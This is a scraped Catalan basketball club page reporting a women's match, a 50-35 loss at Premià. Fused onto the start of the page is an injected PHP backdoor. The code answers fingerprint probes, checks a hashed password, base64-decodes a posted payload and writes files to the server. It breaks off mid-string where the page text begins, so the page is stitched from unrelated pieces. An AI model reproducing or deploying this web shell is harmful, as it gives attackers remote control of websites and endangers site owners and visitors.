function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El TGN cau a Premià en un partit molt físic (50-35) - Tgn Bàsquet Club -

El TGN cau a Premià en un partit molt físic (50-35)

Updated: febrer 4, 2024

Partit corresponent a la setzena  jornada de Supercopa Catalunya femenina, on el Sènior A ha visitat la pista del AB Premià, equip que arribava amb un balanç de 6 victories i 9 derrotes.

El partit va començar amb un bonic duel de triples entre la jugadora local Laia Piñol i l’Andrea Sisniega, anotant 2 triples cadascuna que obrien un partit que donava mostres de molta igualtat per part dels dos equips. Va arribar a posar-se per davant l’equip dirigit per Israel Esteve (6-8 al minut 5), però a partir d’aquí les locals van imposar un tó físic superior i van bloquejar completament l’atac lila, que no va poder sumar cap punt més al primer període (18-8 al final dels primers 10 minuts).

El segon quart va estar marcat per un constant intercanvi de cops entre els dos equips. El nivell físic imposat per les jugadores del Premià es va mantenir molt alt durant tot el partit, dificultant el desenvolupament del joc ofensiu del TGN Bàsquet. Al descans, el marcador era de 29-19.

Conscients dels aspectes a millorar, el TGN va sortir a pista molt més concentrat a la segona meitat. El nivell defensiu de l’equip va millorar considerablement en el tercer quart, però les liles no van aconseguir trobar bones opcions i la manca d’encert en els llançaments va ser una llosa molt gran. Tot i això, el TGN no va marxar del partit i va guanyar el 3r quart, situant el 41-32 al marcador.

Finalment, l’últim periode va ser una mostra més de l’impotència ofensiva de l’equip tarragoní, que es va veure superat per l’agressiva defensa del Premià, que no va cedir el control del partit. El partit va acabar amb el resultat de 50-35.

A la propera jornada, el TGN rebrà la visita del Samà Vilanova, el dimecres 21 de febrer a les 21h.